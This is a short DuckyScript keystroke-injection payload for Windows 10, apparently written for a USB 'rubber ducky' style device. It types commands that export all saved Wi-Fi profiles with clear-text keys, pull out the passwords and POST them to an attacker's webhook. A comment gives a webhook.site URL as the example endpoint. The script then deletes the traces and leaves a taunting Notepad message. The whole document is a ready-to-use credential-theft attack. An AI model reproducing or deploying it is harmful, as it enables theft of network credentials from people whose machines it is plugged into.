REM Polish made this trying to code.
REM Target Win 10
REM Sending WIFI Passwords through a webhook
REM Replace <your_webhook_here> with your webhook like https://webhook.site/4f8b246c-2071-49c5-baa6-07983dffc024
GUI r
DELAY 500
STRING CMD
ENTER
DELAY 500
STRING cd %temp%
ENTER
DELAY 300
STRING netsh wlan export profile key=clear
ENTER
DELAY 500
STRING powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
ENTER
DELAY 500
STRING powershell Invoke-WebRequest -Uri <your_webhook_here> -Method POST -InFile Wi-Fi-PASS
ENTER
DELAY 1000
STRING del Wi-* /s /f /q
ENTER
DELAY 500
STRING exit
ENTER
DELAY 1000
GUI r
ENTER
DELAY 500
STRING notepad
ENTER
DELAY 500
STRING I'm Sorry my Kind Sir, I did steal your wifi Passwords.
